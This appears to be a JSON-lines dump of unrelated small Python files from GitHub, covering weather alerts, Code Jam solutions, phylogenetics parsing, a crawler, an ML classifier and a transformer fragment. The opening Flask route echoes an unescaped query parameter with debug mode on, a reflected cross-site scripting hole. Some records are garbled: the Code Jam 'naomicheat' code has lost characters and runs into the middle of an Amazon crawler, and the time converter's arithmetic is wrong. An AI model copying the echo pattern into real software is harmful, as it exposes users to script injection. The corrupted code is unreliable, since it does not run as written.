render_template(\"index.html\")\n\n@app.route('/search', methods=['GET'])\ndef search_function():\n query = request.args['q']\n return \"Search query entered = {}\".format(query)\n\n#######################\n###################\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"sauravpanchal/test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25508252143","text":"from dotenv import load_dotenv\nimport os\nimport requests\n\nload_dotenv()\n\napi_key = os.getenv(\"APIKEY\")\nENDPOINT = \"https://api.openweathermap.org/data/2.5/onecall\"\nLONG = \"-78.8664\"\nLAT = \"36.0335\"\nEXCLUDE=\"current,minutely,daily,alerts\"\n\nparameters = {\n \"lat\": LAT,\n \"lon\": LONG,\n \"exclude\": EXCLUDE,\n \"appid\": api_key,\n \"units\": \"imperial\"\n}\n\nresponse = requests.get(url=ENDPOINT, params=parameters)\n\nresponse.raise_for_status()\n\nbody = response.json()\n#print(body[\"hourly\"])\nhourly_slice = body['hourly'][:12]\n\nfor hour in hourly_slice:\n weather_id = hour['weather'][0]['id']\n if weather_id < 700:\n print(\"bring an umbrella\")\n 
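        # OpenWeatherMap groups condition ids by their hundreds digit
        # (2xx thunderstorm, 3xx drizzle, 5xx rain, 6xx snow), so an id below
        # 700 in any of the next 12 hourly slots means some form of precipitation.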
break","repo_name":"sdearth/pythoncourse","sub_path":"rain_alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23433113511","text":"from bisect import *\r\ndef naomicheat(f=\"E:\\\\Users\\\\Neta\\\\Downloads\\\\D-large.in\"):\r\n file = open(f, 'r')\r\n iternumber=int(file.readline().replace(\"\\n\",\"\"))\r\n for k in range(iternumber):\r\n n=int(file.readline().replace(\"\\n\",\"\"))\r\n naomi=sorted(file.readline().replace(\"\\n\",\"\").split(\" \"))\r\n ken=sorted(file.readline().replace(\"\\n\",\"\").split(\" \"))\r\n naomi=[float(i) for i in naomi]\r\n ken=[float(i) for i in ken]\r\n i=0\r\n j=0\r\n cheat=0\r\n legal=0\r\n #Stable solution provided, it's 3 and a half at the morning and im still\r\n #at this thingy... too tired to solve the 3rd question\r\n #at this point, i didn't even consider if this solutin is better\r\n #than the previous one, but Baylife.\r\n while(inaomi[i]):\r\n i=find_lt(naomi[i:],ken[j])+i+1\r\n else:\r\n j=j+1\r\n i=i+1\r\n cheat=cheat+1\r\n i=n-1\r\n j=n-1\r\n while(i>=0):\r\n if(ken[j] 0\n\n # Assert that the state file was created\n state_file = Path(runner.state_manager.base_path).glob(\"*.json\")\n assert len(list(state_file)) == 1\n\n\ndef test_config_interpolation_values(runner: Runner):\n \"\"\"\n Make sure the tap and target names are correct.\n \"\"\"\n assert runner.interpolation_values[\"TAP_EXECUTABLE\"] == \"tap-mock-fixture\"\n assert runner.interpolation_values[\"TARGET_EXECUTABLE\"] == \"target-jsonl\"\n\n\ndef test_config_interpolation_target_values(tap: Tap):\n \"\"\"\n Make sure the config gets interpolated correctly on the singer side.\n \"\"\"\n target = Target(\n \"target-jsonl\",\n config={\n \"tap_name\": \"{TAP_NAME}\",\n },\n )\n\n runner = Runner(tap, target)\n\n assert runner.target.config[\"tap_name\"] == \"tap_mock_fixture\"\n","repo_name":"quantile-development/elx","sub_path":"tests/test_elx/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"27692559045","text":"\n\nimport token_server\nimport token_server.getToken\nimport requests\n\nimport json\n\n\ntoken = token_server.getToken.get()\npostUrl = \"https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=\" + token\n\nmsg = {\n \"touser\":\"userid_TODO\",\n \"msgtype\":\"text\",\n \"text\":\n {\n \"content\":\"Hello World\"\n }\n}\n\n\nr = requests.post(postUrl, data=json.dumps(msg))\nprint(r.text)\n","repo_name":"extendswind/python_tool_code","sub_path":"wechat_offical_account/postMessage.py","file_name":"postMessage.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26719056047","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 10 08:23:33 2017\n\n@author: xjw1001001\n\"\"\"\n#only when PAML in desktop is available,the yeast version only\nfrom Bio import Seq, SeqIO, AlignIO\nfrom Bio.Phylo.PAML import codeml, baseml\nimport numpy as np\nparalog_list = [['YLR406C', 'YDL075W'],\n ['YER131W', 'YGL189C'],\n ['YML026C', 'YDR450W'],\n ['YNL301C', 'YOL120C'],\n ['YNL069C', 'YIL133C'],\n ['YMR143W', 'YDL083C'],\n ['YJL177W', 'YKL180W'],\n ['YBR191W', 'YPL079W'],\n ['YER074W', 'YIL069C'],\n ['YDR418W', 'YEL054C'],\n ['YBL087C', 'YER117W'],\n ['YLR333C', 'YGR027C'],\n ['YMR142C', 
'YDL082W'],\n ['YER102W', 'YBL072C'],\n ]\n\nfor pair in paralog_list:\n primalline=[]\n fastaline=[]\n with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace('node #14','Root'+pair[0])\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n sline=sline.replace('node#15','N0'+pair[0])\n for i in range(5):\n sline=sline.replace('node#' + str(15+1+i),'N'+str(1+i)+pair[1])\n sline=sline.replace('node#' + str(20+1+i),'N'+str(1+i)+pair[0])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \n f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\n for line in fastaline:\n f1.write(line)\n f1.write('\\n')\n f1.close()\n\n#ERa_ERb\npair = ['ERa','ERb']\nprimalline=[]\nfastaline=[]\nsubstitution_dict = {'node#39':'N14ERa','node#38':'N8ERa','node#37':'N7ERa','node#36':'N6ERa','node#41':'N9ERa','node#40':'N5ERa'\n ,'node#35':'N4ERa','node#44':'N13ERa','node#46':'N12ERa','node#47':'N11ERa','node#45':'N10ERa'\n ,'node#43':'N3ERa','node#42':'N2ERa','node#34':'N1ERa'\n ,'node#53':'N14ERb','node#52':'N8ERb','node#51':'N7ERb','node#50':'N6ERb','node#55':'N9ERb','node#54':'N5ERb'\n ,'node#49':'N4ERb','node#58':'N13ERb','node#60':'N12ERb','node#61':'N11ERb','node#59':'N10ERb'\n ,'node#57':'N3ERb','node#56':'N2ERb','node#48':'N1ERb'}\nwith open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace('node #32','Root'+pair[0])\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n sline=sline.replace('node#33','N0'+pair[0])\n for i in substitution_dict.keys():\n sline=sline.replace(i,substitution_dict[i])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \nf1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\nfor line in fastaline:\n f1.write(line)\n f1.write('\\n')\nf1.close()\n\n#ARa_ERa\npair = ['ARa','ERa']\nprimalline=[]\nfastaline=[]\nsubstitution_dict = {'node#36':'N12ERa','node#35':'N11ERa','node#34':'N7ERa','node#33':'N6ERa','node#32':'N5ERa','node#37':'N8ERa'\n ,'node#31':'N4ERa','node#41':'N10ERa','node#40':'N9ERa','node#39':'N3ERa','node#38':'N2ERa'\n ,'node#30':'N1ERa'\n ,'node#48':'N12ARa','node#47':'N11ARa','node#46':'N7ARa','node#45':'N6ARa','node#44':'N5ARa','node#49':'N8ARa'\n ,'node#43':'N4ARa','node#53':'N10ARa','node#52':'N9ARa','node#51':'N3ARa','node#50':'N2ARa'\n ,'node#42':'N1ARa','node#29':'N0ERa','node#28':'RootERa'}\nwith open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n for i in substitution_dict.keys():\n sline=sline.replace(i,substitution_dict[i])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \nf1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\nfor line in fastaline:\n f1.write(line)\n f1.write('\\n')\nf1.close()\n\n#ARGRMRPR\npairlist = [['AR', 'MR'],\n ['AR', 'GR'],\n ['AR', 'PR'],\n ['MR', 'GR'],\n ['MR', 'PR'],\n ['PR', 'GR']]\nfor pair in pairlist:\n primalline=[]\n 
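    # Each receptor pair reuses the same PAML output layout: the substitution_dict
    # built below maps PAML's anonymous internal labels ('node#NN') onto named
    # ancestral nodes (N1..N9, one set per paralog) before the sequences are written out.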
fastaline=[]\n substitution_dict = {'node#25':'N4'+pair[0],'node#31':'N9'+pair[0],'node#30':'N7'+pair[0]\n ,'node#32':'N8'+pair[0],'node#29':'N6'+pair[0],'node#28':'N5'+pair[0]\n ,'node#27':'N3'+pair[0],'node#26':'N2'+pair[0],'node#24':'N1'+pair[0]\n ,'node#34':'N4'+pair[1],'node#40':'N9'+pair[1],'node#39':'N7'+pair[1]\n ,'node#41':'N8'+pair[1],'node#38':'N6'+pair[1],'node#37':'N5'+pair[1]\n ,'node#36':'N3'+pair[1],'node#35':'N2'+pair[1],'node#33':'N1'+pair[1]\n ,'node#23':'N0'+pair[0],'node#22':'ROOT'+pair[0]\n }\n with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) +'/out/construct.fasta','r') as f:\n for line in f.readlines():\n primalline.append(line)\n sline = '>' + line\n sline=sline.replace(' ','')\n sline=sline.replace('\\n','')\n for i in substitution_dict.keys():\n sline=sline.replace(i,substitution_dict[i])\n sline=sline.replace(pair[0],pair[0] + '\\n')\n sline=sline.replace(pair[1],pair[1] + '\\n')\n fastaline.append(sline) \n f1 = open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) +'.fasta','w+')\n for line in fastaline:\n f1.write(line)\n f1.write('\\n')\n f1.close()\n\nPAML_parameter_dict = {}\npath = '/Users/xjw1001001/Desktop/PAML/'\nparalog_list = [['YLR406C', 'YDL075W'],#pair#TODO: other data\n ['YER131W', 'YGL189C'], ['YML026C', 'YDR450W'], ['YNL301C', 'YOL120C'], ['YNL069C', 'YIL133C'],\n ['YMR143W', 'YDL083C'], ['YJL177W', 'YKL180W'], ['YBR191W', 'YPL079W'], ['YER074W', 'YIL069C'],\n ['YDR418W', 'YEL054C'], ['YBL087C', 'YER117W'], ['YLR333C', 'YGR027C'], ['YMR142C', 'YDL082W'],\n ['YER102W', 'YBL072C'], ['EDN', 'ECP'],['ERa', 'ERb'],['AR', 'MR'],['AR', 'GR'],['AR', 'PR'],\n ['MR', 'GR'],['MR', 'PR'],['PR', 'GR'] ] \nfor pair in paralog_list:#parameters: kappa(-5), omega(-1), tau,branches \n PAML_parameter_dict['_'.join(pair)] = {}\n codeml_result = codeml.read(path+'output/' + '_'.join(pair) + '/out/' + '_'.join(pair) + '_codeml')\n #baseml_result = baseml.read('/Users/xjw1001001/Documents/GitHub/IGCexpansion2/test/Ancestral_reconstruction/PAML/output/' + '_'.join(pair) + '/' + '_'.join(pair) + '_baseml')\n parameter_list = codeml_result['NSsites'][0]['parameters']['parameter list'].split(' ')\n PAML_parameter_dict['_'.join(pair)]['kappa'] = parameter_list[-5]\n PAML_parameter_dict['_'.join(pair)]['omega'] = parameter_list[-1]\n \n ","repo_name":"xjw1001001/IGCexpansion","sub_path":"test/Ancestral_reconstruction/PAML/parse reconstructed fasta.py","file_name":"parse reconstructed fasta.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26662826915","text":"# this is a simple code to get google search numbers for a word.\n\n# import packages\n\nfrom pytrends.request import TrendReq\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\n# define a function for this simple task\n\ndef get_searches ( key_word, state, time_frame ):\n \n pytrends = TrendReq(hl = 'en-US', tz = 360)\n pytrends.build_payload([key_word], cat= 0, timeframe= '{}'.format(time_frame),\n gprop='', geo='US-{}'.format(state))\n df = pytrends.interest_over_time()\n print(df.head())\n\n sns.set()\n df['timestamp'] = pd.to_datetime(df.index)\n sns.lineplot(df['timestamp'], df[key_word])\n\n plt.title(\"Normalized search for {} in {}\".format(key_word, state))\n plt.xlabel(\"Date\")\n plt.ylabel(\"Number of search \")\n plt.show()\n\n\n# here you can put search word, State code and time frame\n# time frame should be in this format 'YYYY-MM-DD 
YYYY-MM-DD'\n\nget_searches('Corona', 'NY', '2020-03-01 2020-03-30') \n","repo_name":"munirdin87/projects","sub_path":"google_search.py","file_name":"google_search.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23432933281","text":"f = open('d.in')\nout = open('d.out', 'w+')\nt = int(f.readline())\ndef res(blocks, choice):\n if choice > blocks[len(blocks)-1]:\n return blocks[0]\n else:\n i = 0\n while blocks[i] < choice:\n i+=1\n return blocks[i]\nfor tc in range(t):\n f.readline()\n nao = sorted([float(a) for a in f.readline().split()])\n ken = sorted([float(a) for a in f.readline().split()])\n fnao = nao[:]\n fken = ken[:]\n fscore = 0\n score = 0\n while len(nao) > 0:\n fn = fnao.pop(len(fnao)-1)\n fk = fken.pop(fken.index(res(fken, fn)))\n if fn > fk:\n fscore += 1\n if min(nao) div.a-spacing-small > div.a-spacing-none > a\")\r\n for s in selects:\r\n get = s.get(\"href\")\r\n print(get)\r\n books_detail_URL.append(get)\r\n\r\n# We can use a with statement to ensure threads are cleaned up promptly\r\ndef main():\r\n with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:\r\n for data in executor.map(load_url, URLS):\r\n with open(\"Books_detail_URL.txt\", \"w\") as f:\r\n f.write(json.dumps(books_detail_URL))\r\n\r\nif __name__ == '__main__':\r\n t_s = time.time()\r\n main()\r\n t_e = time.time()\r\n print(t_e-t_s)","repo_name":"frankye1000/python--crawling","sub_path":"Crawling--Amazon/Amazon_thread_to_txt.py","file_name":"Amazon_thread_to_txt.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33900888051","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nimport lightgbm as lgbm\nimport datetime\nimport warnings\nwarnings.filterwarnings('ignore')\nstart = datetime.datetime.now()\n\ntrain = pd.read_csv('train_processed1.csv')\n# test = pd.read_csv('test_processed1.csv')\ntrain['category_id_2'] = train['category_id_2'].astype(np.float32)\nX_train, X_test, Y_train, Y_test = train_test_split(train['ITEM_NAME'], train['category_id_2'], random_state = 0, test_size=0.2, shuffle=True)\n\ncount_vect = CountVectorizer()\nX_train_counts = count_vect.fit_transform(X_train)\ntfidf_transformer = TfidfTransformer()\nX_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)\nX_test_counts = count_vect.transform(X_test)\n\nX_train_tfidf = X_train_tfidf.astype('float32')\nX_test_counts = X_test_counts.astype('float32')\nY_train = Y_train.astype('float32')\nY_test = Y_test.astype('float32')\n\nclf_gbm=lgbm.LGBMClassifier(boosting_type='gbdt', objective='multiclass', learning_rate=0.02, num_leaves=60, max_depth=4,\n n_estimators=2000, silent=True)\n\nclf_gbm.fit(X_train_tfidf, Y_train, eval_set=[(X_train_tfidf, Y_train), (X_test_counts, Y_test)], early_stopping_rounds=50, verbose=10) #x_train和y_train 是numpy或pandas数据类型即可\npre = clf_gbm.predict(X_test_counts)\n\n\nclf_gbm.booster_.save_model('lgb_model1.txt', num_iteration=clf_gbm.best_iteration_)\nprint(accuracy_score(Y_test, pre))\n# bst = lgbm.Booster(model_file='lgb_model.txt')\nend = datetime.datetime.now()\nprint(end-start)\n# train_X_1 = count_vect.transform(train['ITEM_NAME']).astype('float32')\n# train['label'] = clf_gbm.predict(train_X_1)\n# 
train.to_csv('train_lll.csv',index=False)","repo_name":"NJUPTGK/wenbenfenlei","sub_path":"lgb.py","file_name":"lgb.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24344983033","text":"\"\"\"\nAuthor username(s): pylescj ; johnsoam\nDate: September 7, 2016\nAssignment/problem number: Homework Assignment 2/Problem 2\nAssignment/problem title: Time Conversion\n\"\"\"\nprint(\"Welcome to Time Converter.\")\noriginalTime=float(input(\"Please enter the time in milliseconds: \"))\nsecondsTens=int(originalTime//10000%6)\nsecondsOnes=int(originalTime%10000)/1000\nminutes=int((originalTime//60000))\nprint(\"Time: \"+str(minutes)+\":\"+str(secondsTens)+str(secondsOnes))\n","repo_name":"Redwoods87/CS167","sub_path":"time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5439802985","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport urllib2\n\n\ndef get_xml():\n \"\"\"\n Get xml file from a server and save it.\n \"\"\"\n url = 'http://sargo.bolt.stxnext.pl/users.xml'\n source = urllib2.urlopen(url)\n contents = source.read()\n\n with open('runtime/data/users.xml', 'w') as export:\n export.write(contents)\n\n\nget_xml()\n","repo_name":"d-wysocki/presence-analyzer-dwysocki","sub_path":"get_xml.py","file_name":"get_xml.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17184611980","text":"import MicrophoneStream as MS\nimport ex4_getText2VoiceStream as gt2v\nimport weather_inform\nimport traffic_inform\nimport news_inform\n\ndef action(text):\n keyword_1=\"교통\"\n keyword_2=\"날씨\"\n keyword_3=\"일정\"\n keyword_4=\"뉴스\"\n\n if (keyword_1 in text):\n print(\"교통정보 알려드림\")\n MS.play_file(\"./data/yes_sound.wav\")\n gt2v.getText2VoiceStream(traffic_inform.getBusInform(), \"./reply_sound.wav\")\n MS.play_file(\"./reply_sound.wav\")\n elif (keyword_2 in text):\n print(\"날씨 알려드림\")\n MS.play_file(\"./data/yes_sound.wav\")\n gt2v.getText2VoiceStream(weather_inform.getWeather(), \"./reply_sound.wav\")\n MS.play_file(\"./reply_sound.wav\")\n \n elif (keyword_3 in text):\n print(\"\")\n MS.play_file(\"./data/yes_sound.wav\") \n elif (keyword_4 in text):\n print(\"뉴스 정보 알려드림\")\n MS.play_file('./data/yes_sound.wav')\n news = news_inform.getNews()\n for i in range(5):\n gt2v.getText2VoiceStream(news[i], \"./reply_sound.wav\")\n MS.play_file(\"./reply_sound.wav\")\n else:\n MS.play_file(\"./data/reQuery_sound.wav\")\n","repo_name":"Gachon-P/AI","sub_path":"Briefe.py","file_name":"Briefe.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41213397506","text":"# Import the Gtts module for text \n# to speech conversion\n#pip install gTTS\nfrom gtts import gTTS \n \n# import Os module to start the audio file\nimport os \n \nmytext = 'Hello my name is manas kumar mahanandia'\n \n# Language we want to use \nlanguage = 'en-US'\n \n\nmyobj = gTTS(text=mytext, lang=language, slow=False) \n \n\nmyobj.save(\"output.mp3\") \n \n# Play the converted file \nos.system(\"start output.mp3\") 
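# 'start' is a Windows shell verb, so the line above is Windows-only. A portable
# sketch (assuming afplay on macOS and xdg-open on a Linux desktop, neither of
# which is guaranteed to be installed):
import platform
import subprocess

player = {'Darwin': 'afplay', 'Linux': 'xdg-open'}.get(platform.system())
if player:
    subprocess.run([player, 'output.mp3'])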
","repo_name":"Tapas15/Python-Projects","sub_path":"text2speech/text2speech0.py","file_name":"text2speech0.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26247751848","text":"import os.path as osp\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom openstl.api import BaseExperiment\nfrom openstl.utils import (create_parser, default_parser, get_dist_info, load_config,\n setup_multi_processes, update_config)\n\ntry:\n import nni\n has_nni = True\nexcept ImportError: \n has_nni = False\n\n\nif __name__ == '__main__':\n args = create_parser().parse_args()\n config = args.__dict__\n\n if has_nni:\n tuner_params = nni.get_next_parameter()\n config.update(tuner_params)\n\n cfg_path = osp.join('./configs', args.dataname, f'{args.method}.py') \\\n if args.config_file is None else args.config_file\n if args.overwrite:\n config = update_config(config, load_config(cfg_path),\n exclude_keys=['method'])\n else:\n loaded_cfg = load_config(cfg_path)\n config = update_config(config, loaded_cfg,\n exclude_keys=['method', 'batch_size', 'val_batch_size',\n 'drop_path', 'warmup_epoch'])\n default_values = default_parser()\n for attribute in default_values.keys():\n if config[attribute] is None:\n config[attribute] = default_values[attribute]\n\n # set multi-process settings\n setup_multi_processes(config)\n\n print('>'*35 + ' training ' + '<'*35)\n exp = BaseExperiment(args)\n rank, _ = get_dist_info()\n exp.train()\n\n if rank == 0:\n print('>'*35 + ' testing ' + '<'*35)\n mse = exp.test()\n\n if rank == 0 and has_nni:\n nni.report_final_result(mse)\n","repo_name":"chengtan9907/OpenSTL","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":403,"dataset":"github-code","pt":"61"} +{"seq_id":"34839170684","text":"from constants import LARGEST_EPOCH_TIME, SMALLEST_EPOCH_TIME\nfrom dao import (\n delete_from_collection,\n events_collection,\n get_all_data,\n get_item_by_id,\n line_items_collection,\n remove_event_from_line_item,\n upsert,\n upsert_with_id,\n)\nfrom flask import Blueprint, jsonify, request\nfrom flask_jwt_extended import jwt_required, get_current_user\nfrom helpers import html_date_to_posix\n\nevents_blueprint = Blueprint(\"events\", __name__)\n\n# TODO: Exceptions\n\n\n@events_blueprint.route(\"/api/events\", methods=[\"GET\"])\n@jwt_required()\ndef all_events():\n \"\"\"\n Get All Events\n Filters:\n - Start Time\n - End Time\n \"\"\"\n filters = {}\n print(f\"Current User: {get_current_user()['username']}\")\n start_time = float(request.args.get(\"start_time\", SMALLEST_EPOCH_TIME))\n end_time = float(request.args.get(\"end_time\", LARGEST_EPOCH_TIME))\n filters[\"date\"] = {\"$gte\": start_time, \"$lte\": end_time}\n events = get_all_data(events_collection, filters)\n events_total = sum(event[\"amount\"] for event in events)\n return jsonify({\"total\": events_total, \"data\": events})\n\n\n@events_blueprint.route(\"/api/events/\", methods=[\"GET\"])\n@jwt_required()\ndef get_event(event_id):\n \"\"\"\n Get An Event\n \"\"\"\n event = get_item_by_id(events_collection, event_id)\n return jsonify(event)\n\n\n@events_blueprint.route(\"/api/events\", methods=[\"POST\"])\n@jwt_required()\ndef post_event():\n \"\"\"\n Create An Event\n \"\"\"\n new_event = request.get_json()\n if len(new_event[\"line_items\"]) == 0:\n return jsonify(\"Failed to Create Event: No Line Items Submitted\")\n\n 
filters = {}\n filters[\"_id\"] = {\"$in\": new_event[\"line_items\"]}\n line_items = get_all_data(line_items_collection, filters)\n earliest_line_item = min(line_items, key=lambda line_item: line_item[\"date\"])\n\n new_event[\"id\"] = f\"event{earliest_line_item['id'][9:]}\"\n if new_event[\"date\"]:\n new_event[\"date\"] = html_date_to_posix(new_event[\"date\"])\n else:\n new_event[\"date\"] = earliest_line_item[\"date\"]\n\n if new_event[\"is_duplicate_transaction\"]:\n new_event[\"amount\"] = line_items[0][\"amount\"]\n else:\n new_event[\"amount\"] = sum(line_item[\"amount\"] for line_item in line_items)\n\n upsert_with_id(events_collection, new_event, new_event[\"id\"])\n for line_item in line_items:\n line_item[\"event_id\"] = new_event[\"id\"]\n upsert(line_items_collection, line_item)\n\n return jsonify(\"Created Event\")\n\n\n@events_blueprint.route(\"/api/events/\", methods=[\"DELETE\"])\n@jwt_required()\ndef delete_event(event_id):\n \"\"\"\n Delete An Event\n \"\"\"\n event = get_item_by_id(events_collection, event_id)\n line_item_ids = event[\"line_items\"]\n delete_from_collection(events_collection, event_id)\n for line_item_id in line_item_ids:\n remove_event_from_line_item(line_item_id)\n return jsonify(\"Deleted Event\")\n\n\n@events_blueprint.route(\"/api/events//line_items_for_event\", methods=[\"GET\"])\n@jwt_required()\ndef get_line_items_for_event(event_id):\n \"\"\"\n Get All Line Items Belonging To An Event\n \"\"\"\n try:\n event = get_item_by_id(events_collection, event_id)\n line_items = []\n for line_item_id in event[\"line_items\"]:\n line_items.append(get_item_by_id(line_items_collection, line_item_id))\n return jsonify({\"data\": line_items})\n except Exception as e:\n return jsonify(error=str(e)), 403\n","repo_name":"neerajsamtani/budget.rip","sub_path":"server/resources/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73845929793","text":"\"\"\"\nColumn major 2d array operation\nPrefix count\n\"\"\"\n\n\ndef main():\n r, c = map(int, input().split())\n\n grid = []\n for _ in range(r):\n grid.append([x for x in input()])\n\n result = [[0 for _ in range(c)] for _ in range(r)]\n for j in range(c):\n # Prefix count apples in each column\n col = [0 for _ in range(r)]\n for i in range(r):\n col[i] = 1 if (grid[i][j] == \"a\") else 0\n if i > 0 and grid[i - 1][j] != \"#\":\n col[i] += col[i - 1]\n\n # Draw from bottom to top\n num = col[-1] # Number of apples to be drawn\n for i in range(r):\n k = -i - 1\n if grid[k][j] == \"#\":\n result[k][j] = \"#\"\n num = col[k]\n elif num > 0:\n result[k][j] = \"a\"\n num -= 1\n else:\n result[k][j] = \".\"\n\n for row in result:\n print(\"\".join(row))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jetkan-yk/phyting","sub_path":"cp4/lineards/2darray/apples.py","file_name":"apples.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8508129962","text":"def done_or_not(board): # board[i][j]\n for list in board:\n a = set(list)\n if len(a) != 9:\n return \"Try again!\"\n lister = []\n for i in range(len(board[0])):\n templist = []\n\n for j in range(len(board)):\n templist.append(board[j][i])\n lister.append(templist)\n\n for list in lister:\n a = set(list)\n if len(a) != 9:\n return \"Try again!\"\n\n answer = []\n for r in range(3):\n for c in range(3):\n block = []\n for i in 
range(3):\n            for j in range(3):\n                block.append(board[3*r + i][3*c + j])\n            answer.append(block)\n\n    for block in answer:\n        a = set(block)\n        if len(a) != 9:\n            return \"Try again!\"\n    return \"Finished!\"","repo_name":"consolelogreece/Coding-Challenges","sub_path":"Codewars/5 Kyu/Did I finish my Sudoku.py","file_name":"Did I finish my Sudoku.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23421750951","text":"__author__ = 'nik'\n\n\ndef main():\n    output_file = open('output', 'w')\n    with open('input') as input_file:\n        next(input_file)\n        case_num = 0\n        for line in input_file:\n            if line.endswith('\\n'):\n                line = line[: len(line) - 1]\n            line = line.split(' ')\n\n            s = 2\n            time = 0\n            c = float(line[0])\n            f = float(line[1])\n            x = float(line[2])\n\n            while (x / s) > (x / (s + f) + (c / s)):\n                time += c / s\n                s += f\n            else:\n                time += x / s\n\n            case_num += 1\n\n            out = \"Case #\" + str(case_num) + \": \" + \"{0:.7f}\".format(time) + \"\\n\"\n            output_file.write(out)\n            print(out)\n\n\nif __name__ == '__main__': main()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/1388.py","file_name":"1388.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2723381735","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport copy\nimport math\nimport numpy as np\n\ndef nopeak_mask(size, opt):\n    np_mask = np.triu(np.ones((1, size, size)), k=1).astype('uint8')\n    np_mask = Variable(torch.from_numpy(np_mask == 0).to(opt.device))\n    return np_mask\n\ndef create_masks(src, trg, opt):\n    src_mask = (src != opt.src_pad).unsqueeze(-2).to(opt.device)\n\n    if trg is not None:\n        trg_mask = (trg != opt.trg_pad).unsqueeze(-2).to(opt.device)\n        size = trg.size(1) # get seq_len for matrix\n        np_mask = nopeak_mask(size, opt).to(opt.device)\n        trg_mask = trg_mask & np_mask\n\n    else:\n        trg_mask = None\n    return src_mask, trg_mask\n\nclass MultiHeadAttention(nn.Module):\n    def __init__(self, heads, d_model, dropout = 0.1):\n        super().__init__()\n        \n        self.d_model = d_model\n        self.d_k = d_model // heads\n        self.h = heads\n        \n        self.q_linear = nn.Linear(d_model, d_model)\n        self.v_linear = nn.Linear(d_model, d_model)\n        self.k_linear = nn.Linear(d_model, d_model)\n        \n        self.dropout = nn.Dropout(dropout)\n        self.out = 